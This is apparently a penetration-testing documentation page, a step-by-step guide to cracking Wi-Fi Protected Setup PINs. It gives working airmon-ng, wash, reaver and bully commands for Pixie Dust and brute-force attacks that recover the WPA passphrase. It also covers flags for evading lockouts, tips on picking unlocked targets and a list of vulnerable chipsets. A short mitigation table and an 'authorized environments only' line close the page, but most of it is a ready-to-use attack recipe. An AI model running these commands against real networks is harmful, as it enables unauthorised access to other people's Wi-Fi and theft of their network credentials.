Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

WPS (Wi-Fi Protected Setup) PIN is an 8-digit code split into two 4-digit halves, verified independently. This design flaw reduces the keyspace from 10⁸ to ~11,000 combinations, making brute force feasible. Pixie Dust exploits weak nonce generation in some chipsets to recover the PIN offline in seconds.

Tools

ToolPurpose
washEnumerate WPS-enabled APs
reaverWPS PIN brute force + Pixie Dust
bullyAlternative WPS PIN brute force + Pixie Dust

1. Enable Monitor Mode

sudo airmon-ng check kill
sudo airmon-ng start wlan0

2. Enumerate WPS-Enabled Networks

sudo wash -i wlan0mon
Key output columns:
ColumnMeaning
BSSIDAP MAC address
ChChannel
dBmSignal strength
WPSWPS version
LckLocked (Yes = lockout active)
ESSIDNetwork name
Target APs with Lck: No.

3. Pixie Dust Attack

Offline attack — recovers PIN from weak nonces. Fast (seconds on vulnerable chipsets). With reaver: 
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv
With bully: 
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3
-K 1 / -d = Pixie Dust mode. If successful, outputs WPS PIN and WPA passphrase.

4. WPS PIN Brute Force

Online attack — tries all PIN combinations. Takes 4–10 hours on non-locked APs. With reaver: 
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv
With bully: 
sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -v 3
Resume interrupted session (reaver): 
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -S
Session state saved in /etc/reaver/<BSSID>.wpc.

5. Tune for Rate Limiting / Lockouts

sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  --delay=5 \
  --lock-delay=300 \
  --fail-wait=360
FlagEffect
--delaySeconds between PIN attempts
--lock-delayWait time after lockout detected
--fail-waitWait time after consecutive failures

6. Known Vulnerable Chipsets (Pixie Dust)

Chipsets with weak nonce generation:
  • Ralink (RT2860, RT3070, RT5370)
  • Realtek (RTL8188)
  • Broadcom (early firmware)
  • Some Atheros implementations
Check with PixieWPS compatibility list if Pixie Dust fails.

Mitigation Reference

DefenseEffect
Disable WPS entirelyRemoves attack surface
Enable AP PIN lockoutSlows brute force, doesn’t stop Pixie Dust
Updated firmwarePatches weak nonce generation
Always run wash first. Attacking a locked AP (Lck: Yes) wastes time — wait for lockout to reset or target a different AP.
Authorized environments only. WPS attacks against networks you don’t own or have explicit permission to test are illegal.